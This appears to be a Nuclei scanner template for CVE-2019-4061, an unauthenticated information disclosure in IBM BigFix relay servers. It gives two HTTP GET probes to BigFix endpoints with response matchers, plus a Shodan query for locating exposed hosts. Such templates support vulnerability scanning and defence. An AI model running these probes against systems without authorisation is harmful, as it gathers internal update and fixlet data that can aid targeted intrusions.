id: CVE-2019-4061 info: name: IBM BigFix Platform - Information Disclosure author: daffainfo severity: medium description: | IBM BigFix Platform 9.2 and 9.5 contains an information disclosure vulnerability caused by not enabling authenticated access in relay, letting remote attackers query and gather update and fixlet information, exploit requires no authentication. impact: | Attackers can remotely gather sensitive update and fixlet deployment information, potentially aiding targeted attacks. remediation: | Enable authenticated access for relay to prevent unauthorized information queries. reference: - https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers - https://github.com/rapid7/metasploit-framework/blob/0fd8f0984e10a135c000d1fb8797d76d62fb24f7/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb - https://nvd.nist.gov/vuln/detail/CVE-2019-4061 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2019-4061 epss-score: 0.22547 epss-percentile: 0.97463 cwe-id: CWE-200 cpe: cpe:2.3:a:ibm:bigfix_platform:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: ibm product: bigfix_platform shodan-query: port:52311 "BigFixHTTPServer" tags: cve,cve2019,ibm,bigfix,disclosure,vkev flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/masthead/masthead.axfm" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "Organization: ", "-URL: ")' condition: and internal: true - method: GET path: - "{{BaseURL}}/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "x-bes-command-hasiteversion:")' condition: and # digest: 4a0a00473045022100d462c7867d06f0a2aac3f7ae9a88818802e1b2bed7f9aea389fcfb0871e8cfe80220713ccdad1844db56b695363db206ee5dbc3c330dc2578bacd8265b268de5a43f:922c64590222798bb761d5b6d8e72950